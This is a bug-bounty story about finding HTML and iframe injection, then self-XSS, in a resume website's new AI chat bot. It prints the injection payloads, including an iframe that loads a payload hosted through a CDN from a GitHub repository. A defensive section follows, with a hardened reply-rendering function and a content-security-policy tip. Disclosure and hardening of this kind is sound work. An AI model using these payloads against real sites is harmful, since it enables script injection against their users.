Another story time. Eh!
I found a very popular website which people use to make resumes. I mailed them a bug (duplicate) and in reply they added me to their HackerOne programme.
This was in September.
I tested it for days but nothing. Being an old programme, all the corners were checked multiple times already.
On 16th of December I got a mail saying an AI feature was introduced. I didn't pay much attention as I doubted my skills, plus I was testing another one. After 30–45 mins something snapped and I started to throw payloads at the AI bot :)
When I tested for HTML injection:
<h1>a</h1>
<iframe src="https://google.com"></iframe>
Iframe injection worked. Then I used the jsDelivr CDN to host my payload on GitHub and embedded it in an iframe to get XSS.
<iframe src="https://cdn.jsdelivr.net/gh/ScarryParrot/testing@3XXXXXXc20/payload9.pdf"></iframe>
Although I was in doubt about it being accepted, as it does not affect any other users.
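From the defender's side, the behaviour described above is what happens when a chat widget inserts the model's reply into the page as markup. The following is an added example, not code from the original post or from the affected site: a hypothetical reply renderer in its vulnerable form next to a hardened one that escapes everything and restores only a small allow-list of attribute-free formatting tags. All function names, the `bot-msg` class and the allow-list are assumptions.

```javascript
// Added example: hypothetical chat renderer, names are assumptions.

// Vulnerable pattern: the reply is concatenated into markup as-is,
// so any tag the model echoes back (heading, iframe, ...) becomes live DOM.
function renderBotReplyUnsafe(reply) {
  return `<div class="bot-msg">${reply}</div>`;
}

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Neutralise every character that can open a tag, attribute or entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Inert formatting tags that may be restored after escaping (assumed list).
const ALLOWED_TAGS = ['b', 'i', 'em', 'strong', 'code', 'p', 'br'];
const RESTORE_RE = new RegExp(`&lt;(/?)(${ALLOWED_TAGS.join('|')})&gt;`, 'g');

// Hardened pattern: escape first, then restore allow-listed tags only in
// their exact attribute-free form. A tag carrying attributes, or any tag
// outside the list (iframe, h1, script, ...), stays escaped text.
function renderBotReplySafe(reply) {
  const escaped = escapeHtml(reply);
  const formatted = escaped.replace(RESTORE_RE, '<$1$2>');
  return `<div class="bot-msg">${formatted}</div>`;
}

// Constructed sample replies: the two test strings from the post plus
// two formatting cases.
const samples = [
  '<h1>a</h1>',
  '<iframe src="https://google.com"></iframe>',
  'Use <b>bold</b> for section titles',
  '<b onmouseover="x">hover</b>',
];

for (const reply of samples) {
  console.log('unsafe:', renderBotReplyUnsafe(reply));
  console.log('safe:  ', renderBotReplySafe(reply));
}
```

A `Content-Security-Policy` response header with `frame-src 'none'` limits the impact if an unescaped path is missed elsewhere in the widget.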